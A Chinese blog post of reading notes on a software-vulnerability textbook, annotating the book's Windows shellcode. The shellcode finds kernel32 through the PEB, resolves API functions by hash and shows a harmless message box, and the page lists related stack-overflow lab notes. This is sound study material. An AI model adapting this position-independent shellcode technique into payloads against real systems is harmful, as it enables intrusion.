《0day:软件漏洞分析技术》读书笔记

最新推荐文章于 2022-11-27 19:24:21 发布
最新推荐文章于 2022-11-27 19:24:21 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: 读书笔记 文章标签: 0day软件漏洞分析技术 shellcode 
//此代码出自《0day安全:软件漏洞分析技术》P93:添加注释
//注释中实际内存地址,就是虚拟地址。
#include <stdlib.h>
#include <stdio.h>

int main()
{
  _asm
  {
    CLD
    push 0x1e380a6a  ;MessageBoxA
    push 0x4fd18963  ;ExitProcess
    push 0x0c917432  ;LoadLibraryA
    mov esi, esp  ;esi指向的是LoadLibraryA
    lea edi, [esi - 0xc]  ;edi指向的是未使用的栈地址起始位置,用来保存函数地址

    xor ebx, ebx  ;ebx = 0
    mov bh, 0x04  ;ebx = 0x4
    sub esp, ebx  ;栈地址提升4个偏移

    mov bx, 0x3233  ;32
    push ebx
    push 0x72657375  ;user
    push esp    ;将栈中放入user32
    xor edx, edx  ;清edx

    mov ebx, fs:[edx + 0x30]  ;ebx进程环境块PEB的地址
    mov ecx, [ebx + 0xc]    ;ecx存放PEB_LDR_DATA结构体的指针
    mov ecx, [ecx + 0x1c]    ;ecx中存放指向模块初始化链表的头指针InInitializationOrderModuleList
    mov ecx, [ecx]        ;InInitializationOrderModuleList中按顺序存放着PE装入运行时初始化模块的信息,
                  ;第一个是ntdll.dll,ntdll.dll所指向的就是kernel32.dll
    mov ebp, [ecx + 0x8]    ;ecx + 0x8就是kernel32.dll在内存中的加载基地址

find_lib_functions:
    lodsd            ;lodsd是把DS:ESI所指向的地址处的数据放入eax中,也就是0x0c917432
                  ;然后ESI+4,此时ESI指向的是ExitProcess
    cmp eax, 0x1e380a6a      ;此处用来判断是否把所有需要的函数地址都获取完成,MessageBoxA
    jne find_functions      ;由于MessageBoxA在user32.dll中,因此,需要先加载user32.dll
    xchg eax, ebp        ;使用ebp保存MessageBoxA的hash
    call [edi - 0x8]      ;LoadLibraryA 参数在上面,push esp那里
    xchg eax, ebp        ;此时ebp为user32.dll的基地址,eax为MessageBoxA的hash

find_functions:
    pushad            ;Push(EAX);0x0c917432  LoadLibraryA
                  ;Push(ECX);kernel32.dll链表节点
                  ;Push(EDX);为0
                  ;Push(EBX);进程环境块PEB的地址
                  ;Push(ESP);该ESP为执行pushad之前的ESP
                  ;Push(EBP);kernel32.dll在内存中的加载基地址
                  ;Push(ESI);esi指向的是ExitProcess
                  ;Push(EDI);edi指向的是未使用的栈地址起始位置,用来保存函数地址
                  ;此处入栈顺序必须记得,后面会使用到
    mov eax, [ebp + 0x3c]    ;Kernel32.dll基地址 + 0x3c是PE头
    mov ecx, [ebp + eax + 0x78]  ;此时ecx存放的是函数导出表的指针
    add ecx, ebp        ;导出表的此次加载实际内存地址
    mov ebx, [ecx + 0x20]    ;偏移0x20处指向导出函数函数名的列表
    add ebx, ebp        ;函数名的列表此次加载的实际内存地址
    xor edi, edi        ;edi清0,用来计数

next_function_loop:
    inc edi
    mov esi, [ebx + edi * 4]  ;取出每个函数名的地址
    add esi, ebp        ;函数名的实际内存地址
    cdq              ;把EDX的所有位都设成EAX最高位的值,可以暂时简单理解为把EDX清0

hash_loop:              ;此处循环计算hash
    movsx eax, byte ptr[esi]
    cmp al, ah          ;判断是否把函数名计算完成
    jz compare_hash
    ror edx, 7
    add edx, eax
    inc esi
    jmp hash_loop

compare_hash:
    cmp edx, [esp + 0x1c]  ;由于刚刚的pushad,把寄存器都压入栈中,此时esp指向的是栈中的EDI,
                ;esp + 1c指向的则是EAX,LoadLibraryA
    jnz next_function_loop
    mov ebx, [ecx + 0x24]  ;在导出表结构中,偏移0x24是导出函数序号的相对虚拟地址
    add ebx, ebp      ;导出函数序号的虚拟地址
    mov di, [ebx + 2 * edi]  ;获取第edi个函数的函数序号,由于函数序号是一个WORD型的数据,因此edi * 2
    mov ebx, [ecx + 0x1c]  ;此处为导出函数的相对虚拟地址
    add ebx, ebp      ;导出函数的虚拟地址
    add ebp, [ebx + 4 * edi];获取函数序号所对应的函数地址,这就是我们最终所需要的函数地址。
    xchg eax, ebp      ;eax为所需要的函数地址
    pop edi          ;EDI出栈,用来保存LoadLibraryA的函数地址
    stosd          ;mov [edi],eax    函数地址保存
                ;add edi,4
    
    push edi        
    popad          ;此时,相对于pushad的时候,只有edi变化了,增加了4,其它寄存器均未变化

    cmp eax, 0x1e380a6a    ;当所有地址都获取完成后
    jne find_lib_functions

function_call:
    xor ebx, ebx
    push ebx
    push 0x2121216E      ;
    push 0x3167304C      ;
    mov eax, esp
    push ebx        ;压入参数
    push eax
    push eax
    push ebx
    call [edi - 0x04]    ;调用MessageBoxA
    push ebx
    call [edi - 0x08]    ;调用ExitProcess
    nop
    nop
    nop
    nop
  }
  system("pause");
  return 0;
}

戏言_19
关注
专栏目录
0day安全:软件漏洞分析技术》学习笔记·1(需要补充节部分)
黑夜黎明
06-13 536
基础知识 漏洞概述   通常把这类能够引起软件做一些“超出设计范围的事情”的bug称为漏洞(vulnerability)。   功能性逻辑缺陷(bug):影响软件的正常功能,例如,执行结果错误,图标显示错误   安全性逻辑缺陷(漏洞):通常情况下不影响软件的正常功能,但被攻击者成功利用后,有可能引起软件去执行额外的恶意代码,常见的漏洞包括软件中的缓冲区溢出漏洞、网络中的跨站脚本漏洞(XSS)、SQ...
一段ShellCode
倒计时
10-12 1227
//此ShellCode0day安全:软件漏洞分析技术书中的。只是对流程进行了梳理,添加了注释。 //注释中实际内存地址,就是虚拟地址。 #include #include int main() { _asm { CLD push 0x1e380a6a ;MessageBoxA push 0x4fd18963 ;ExitProcess push 0x0c9174
《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考
weixin_33810302的博客
07-08 322
I will Make Impossible To I'm possible                     -----------LittleHann   看了2个多星期。终于把0DAY这本书给看完了,自己动手将书上的实验一个一个实现的感觉很不错,在学习的过程中,也增加了自己的信心。 这里希望做一个小小的总结,不是想说明自己有多牛逼,只是觉得学习应该是一个常思考,常总结的过程,分...
一段强大的shellcode
技术之路
12-06 698
代码来源于 exploit-db, 对于研究shellcode, 分析程序的运行以及linux系统有很大的帮助。 /* ;Title: polymorphic execve shellcode ;Author: d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Category: Shellcode ;Architecture:li
0day安全:软件漏洞分析技术》学习笔记-第五章堆溢出利用
u012067492的博客
06-20 1091
快表的使用
读书笔记3:0day安全:软件漏洞分析技术
Cvjark的博客
03-16 243
引用书的原话:”用键盘输入字符的ASCII表示方位有限,很多值(如0x11、0x12等符号)无法直接用键盘输入,所以我们把实验的代码做了下改动,将程序的输入改由文件读取出字符串“ 源码贴出: #include &quot;stdio.h&quot; #include &quot;string.h&quot; #include &quot;stdlib.h&quot; #define PASSWORD &quot;1234567&quot; i
0day安全:软件漏洞分析技术读书笔记1:第1章
prettyX的博客
10-30 242
第1章 基础知识 P29实验 目的:对密码验证部分实现破解 #include <stdio.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; authenticated=strcmp(password,PASSWORD); return authenticated; } main() { int valid_flag=0;
读书笔记0day安全:软件漏洞分析技术
Cvjark的博客
03-16 802
实验2.2修改临近变量: #include "stdafx.h" #include "stdio.h" #include "string.h" #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[8]; //这里声明的变量在后续...
0day安全:软件漏洞分析技术读书笔记2:第2章
prettyX的博客
11-11 342
第2章 栈溢出原理与实践 这一章,我们将做3个实验 通过栈溢出,修改邻接变量 通过栈溢出,修改函数返回地址 通过栈溢出,让进程执行输入数据中植入的代码 实验1:修改邻接变量 P47,研究源码如下 #include <stdio.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[8];//add local buffe
0day安全-软件漏洞分析技术】笔记
小张同学的博客
03-24 4136
C1 基础知识 1.1.3 漏洞分析和利用 漏洞挖掘:实际上是高级测试QA。工程界常用fuzz;学术界用静态分析漏洞分析:找到POC(proof of concept)代码,无法获得POC时,利用厂商提供的漏洞描述,使用补丁比较器,比较patch前后的修改,再利用反汇编工具进行逆向分析漏洞利用:缓冲区溢出;内存漏洞(堆栈溢出),web漏洞(脚本注入) 1.1.4 漏洞公布 CVE:cve.mitre.org cert:cert.org 微软安全中心 每月 第二周 的 周二发布补丁 1.2 二进制
0DAY安全:软件漏洞分析技术
UKK
02-23 602
0DAY安全:软件漏洞分析技术 http://www.ifind.cc/view/150
0day安全:软件漏洞分析技术 读书笔记(1)
crazyskady的博客
11-06 1326
最近听了老外的一个关于secure coding program的培训,感觉挺有意思。网上找了本相关的技术书仔细研究下,做点笔记。 Crack 小实验 书的1.4节介绍了一个在Windows下的代码的crack的实验,利用虚拟机+ubuntu16重现一下: code 实验的code如下,代码逻辑很简单,验证用户的输入密码,如果密码与预定义的PASSWORD相同,验证通过: #include &lt...
0day安全-软件漏洞分析技术(第二版)——Crack实验一
amumu2014的博客
04-11 387
…. 转载于:https://www.cnblogs.com/TB-Go123/p/8797064.html
系统栈工作原理:参考自《0day安全:软件漏洞分析技术(第2版)》
最新发布
qq_51515209的博客
11-27 436
1.进程执行时,每个进程的内存主要分为四个部分:(1)代码区(2)数据区(3)栈区(4)堆区2.系统栈中包含了一个个函数的调用栈(函数栈帧),系统栈通过维护ESP、EBP、EIP等寄存器中的值来完成函数之间的调用关系,其中ESP和EBP用来维护一个独立的函数栈帧。
0day安全学习笔记-第二章
TedLau的博客
04-12 232
第二章学习笔记
读书笔记2:0day安全:软件漏洞分析技术
Cvjark的博客
03-16 208
经过上个笔记的学习,我们了解了调用verify_password(char * password)时栈的情况:(注不了解函数调用方式的建议先找文章了解关键字:call的调用方式) 我们都知道,执行完verify_password(char * password)是call指令调用是还会把它的下条指令地址入栈,用于调用完之后返回上层函数继续执行程序指令: 其实大致方法还是跟修改临近变量的方法一样的...
0day安全软件漏洞分析技术读书笔记-windows2000的堆的工作方式(下)
houjingyi的博客
11-07 2304
#include #include int main() { HLOCAL h1,h2,h3,h4; HANDLE hp; hp=HeapCreate(0,0,0); _asm int 3 h1=HeapAlloc(hp,HEAP_ZERO_MEMORY,8); h2=HeapAlloc(hp,HEAP_ZERO_MEMORY,8); h3=HeapAlloc(hp,HEAP_ZER
安全测试学习笔记二(对于top 10 漏洞分析)
一缕阳光
03-10 730
1, 问题:没有被验证的输入   测试方法:   数据类型(字符串,整型,实数,等)   允许的字符集   最小和最大的长度   是否允许空输入   参数是否是必须的   重复是否允许   数值范围   特定的值(枚举型)   特定的模式(正则表达式)   2, 问题:有问题的访问控制   测试方法:   主要用于需要验证用户身份以及权限的页面,复制该页面的url地址,关
0day安全:软件漏洞分析技术》的一点总结
giantbranch的专栏
03-25 7506
评价 首先评价一下这本书吧:(先抑后扬吧) 有些漏洞是win2000的,实在是太老了,难以进行实践,但是介绍一下也是很好的,但是不能实践理解得不深刻。【第一版是08年出版的,第二版是2011年,我手上的是第二版,这2014年,xp都停止服务啦(xp用着还是挺爽的哦)】
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值